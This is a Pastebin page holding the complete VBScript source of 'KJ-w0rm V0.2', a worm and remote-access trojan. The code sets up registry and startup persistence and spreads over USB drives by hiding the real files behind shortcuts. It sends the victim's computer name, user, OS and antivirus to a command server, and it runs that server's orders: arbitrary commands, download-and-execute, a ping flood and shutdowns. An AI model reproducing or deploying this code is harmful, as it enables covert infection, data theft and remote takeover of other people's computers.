API tools faq
paste
Advertisement
SecurityNajaf

EW

SecurityNajaf
Jan 17th, 2014
152
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 7.96 KB | None | 0 0
raw download clone embed print report
  1.  
  2. '     KJ-w0rm V0.2      
  3. '    BY KSH HACKER  
  4. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-KJ-w0rm=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5. on error resume next
  6. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-KJ-w0rm=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  7. host = "127.0.0.1"
  8. port = 1144
  9. installname = "KJ-w0rm.vbs"
  10. name = "KJ-w0rm"
  11. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-KJ-w0rm=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  12. dim shell
  13. set shell = WScript.CreateObject("WSCRIPT.SHELL")
  14. dim fs
  15. set fs = WScript.CreateObject("Scripting.filesystemobject")
  16. dim installname
  17. dim dir
  18. dir = "temp"
  19. path = shell.ExpandEnvironmentStrings("%" & dir & "%") & "\"
  20. dim spl
  21. spl="|SE-NAJAF|"
  22. dim http
  23. set http = CreateObject("MICROSOFT.XMLHTTP")
  24. dim host
  25. dim port
  26. dim name
  27. dim startup
  28. startup = shell.specialfolders ("startup") & "\"
  29. dim response
  30. dim i
  31. i = 0
  32. dim y
  33. y = 0
  34. dim oneonce
  35. dim cmd
  36. dim usb
  37. usb= shell.regread("HKCU\Windowsshell")
  38. if usb="" then
  39. if lcase( mid(wscript.scriptfullname,2))=":\" &  lcase(installname) then
  40. usb="TRUE"
  41. shell.regwrite "HKCU\Windowsshell",  usb, "REG_SZ"
  42. else
  43. usb="FALSE"
  44. shell.regwrite "HKCU\Windowsshell",  usb, "REG_SZ"
  45.  
  46. end if
  47. end if
  48. Err.Clear
  49.  
  50. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- KJ-w0rm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  51. install
  52. xinstall
  53. while true
  54. cmd = ""
  55. cmd  = Send ("READY","")
  56. response = split(cmd,spl)
  57. select case response(0)
  58. Case "uninstall"
  59. uninstall
  60. case "RE"
  61. shell.run WScript.SCRIPTFULLNAME ,7
  62. WScript.Quit
  63. case "download"
  64. download response(1),path & response(2)
  65. case "update"
  66. oneonce.close
  67. set oneonce =  fs.opentextfile (path & installname ,2, false)
  68. oneonce.write response(1)
  69. oneonce.close
  70. shell.run "wscript.exe //B " & chr(34) & path & installname & chr(34),7
  71. wscript.quit
  72. case "execute"
  73. execute response(1)
  74. case "cmd"
  75. shell.run "%comspec%" & response(1),7
  76. case "Attack"
  77. shell.run "%comspec%" & " /c ping " & response(1) & " -l " & response(2) & " -t",7
  78. case "ourl"
  79. shell.run "%comspec% " & " /c start " & response(1),7
  80. case "close"
  81. WScript.Quit
  82. case "shutdown"
  83. shell.run "%comspec%" & " /c shutdown /s /t " & response(1),7
  84. case "restart"
  85. shell.run "%comspec%" & " /c shutdown /r /t " & response(1),7
  86. case "logoff"
  87. shell.run "%comspec%" & " /c shutdown /l /t " & response(1),7
  88. end select
  89. WSCRIPT.SLEEP 2000
  90. i = i + 1
  91. if i> 2 then
  92. i=0
  93. xinstall
  94. end if
  95.  
  96. wend
  97. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-KJ-w0rm=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  98. function Send(cmd,data)
  99. Send = ""
  100. http.open "POST","http://" & host & ":" & port &"/" & cmd, false
  101. http.setRequestHeader "User-Agent:",  userinfo
  102. http.send data
  103. Send = http.responseText
  104. end function
  105. function userinfo
  106. on error resume next
  107. if userinfo = "" then
  108. x = "XDZX"
  109. userinfo = x & " startinfo" & spl & name & hwid &  spl & computer & spl & username &spl &  OS & spl  &  security & spl &  usb  & spl &  "2.0" &spl &  x
  110. end if
  111. end Function
  112. function computer
  113. computer = shell.expandenvironmentstrings("%computername%")
  114. end function
  115. function username
  116. username = shell.expandenvironmentstrings("%username%")
  117. end function
  118. function hwid
  119. on error resume next
  120. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  121. set disks = root.execquery ("select * from win32_logicaldisk")
  122. for each disk in disks
  123. if  disk.volumeserialnumber <> "" then
  124. hwid = disk.volumeserialnumber
  125. exit for
  126. end if
  127. next
  128. End function
  129. function security
  130. on error resume next
  131. security = ""
  132. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  133. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  134. for each objitem in colitems
  135. versionstr = split (objitem.version,".")
  136. next
  137. versionstr = split (colitems.version,".")
  138. osversion = versionstr (0) & "."
  139. for  x = 1 to ubound (versionstr)
  140. osversion = osversion &  versionstr (i)
  141. next
  142. osversion = eval (osversion)
  143. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  144. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  145. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  146. for each objantivirus in colantivirus
  147. security  = security  & objantivirus.displayname & " ."
  148. next
  149. if security  = "" then security  = "Not Found"
  150. end function
  151. Function OS
  152. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  153. Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
  154. For Each aaa in aa
  155. s= aaa.Caption  
  156. next
  157. OS = s
  158. End Function
  159. sub xinstall
  160. On Error resume next
  161. for each xx in fs.Drives
  162. if xx.isready then
  163. if xx.FreeSpace >0 then
  164. if xx.drivetype=1 then
  165. if fs.fileexists(xx.path & "\" & installname) then
  166. fs.getfile(xx.path & "\"  & installname).Attributes=0
  167. end if
  168. fs.copyfile path & installname , xx.path & "\"  & installname,true
  169. For Each x In fs.GetFolder( xx.path & "\" ).Files
  170. wscript.sleep 1
  171. if instr(x.name,".") then
  172. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  173. x.Attributes = 2+4
  174. if ucase(x.name) <> ucase(installname) then
  175. With shell.CreateShortcut(xx.path & "\"  & x.name & ".lnk")
  176. .TargetPath = "cmd.exe"
  177. .WorkingDirectory = ""
  178. .WindowStyle = 7
  179. .Arguments = "/c start " & Replace(installname," ", ChrW(34) _
  180. & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  181. .IconLocation = shell.regread("HKLM\SOFTWARE\Classes\" & shell.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  182. if instr( .iconlocation,",")=0 then
  183. .iconlocation = .iconlocation &",0"
  184. end if
  185. .Save()
  186. end with
  187. end if
  188. end if
  189. end if
  190. Next
  191. end if
  192. end if
  193. end if
  194. next
  195. Err.Clear
  196. end sub
  197. sub install ()
  198. on error resume Next
  199. shell.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  200. shell.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  201. fs.copyfile wscript.scriptfullname,installdir & path,true
  202. fs.copyfile wscript.scriptfullname,startup & installname ,true
  203. end sub
  204. sub uninstall
  205. on error resume next
  206. dim filename
  207. shell.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  208. shell.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  209. fs.deletefile startup & installname ,true
  210. fs.deletefile wscript.scriptfullname ,true
  211. for  each drive In fs.drives
  212. if  drive.isready = true then
  213. if  drive.freespace  > 0 then
  214. if  drive.drivetype  = 1 then
  215. for  each file in fs.getfolder ( drive.path & "\").files
  216. on error resume next
  217. if  instr (file.name,".") then
  218. if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  219. file.attributes = 0
  220. if  ucase (file.name) <> ucase (installname) then
  221. filename = split(file.name,".")
  222. fs.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  223. else
  224. fs.deletefile (drive.path & "\" & file.name)
  225. end if
  226. end if
  227. end if
  228. next
  229. end if
  230. end if
  231. end if
  232. next
  233. wscript.quit
  234. end sub
  235. sub download (fileurl,filename)
  236. strlink = fileurl
  237. strsaveto = installdir & filename
  238. set objhttpdownload = createobject("msxml2.xmlhttp" )
  239. objhttpdownload.open "get", strlink, false
  240. objhttpdownload.send
  241. set objfsodownload = createobject ("scripting.filesystemobject")
  242. if  objfsodownload.fileexists (strsaveto) then
  243. objfsodownload.deletefile (strsaveto)
  244. end if
  245. if objhttpdownload.status = 200 then
  246. dim  objstreamdownload
  247. set  objstreamdownload = createobject("adodb.stream")
  248. with objstreamdownload
  249. .type = 1
  250. .open
  251. .write objhttpdownload.responsebody
  252. .savetofile strsaveto
  253. .close
  254. end with
  255. set objstreamdownload = nothing
  256. end if
  257. if objfsodownload.fileexists(strsaveto) then
  258. shell.run objfsodownload.getfile (strsaveto).shortpath
  259. end if
  260. end sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!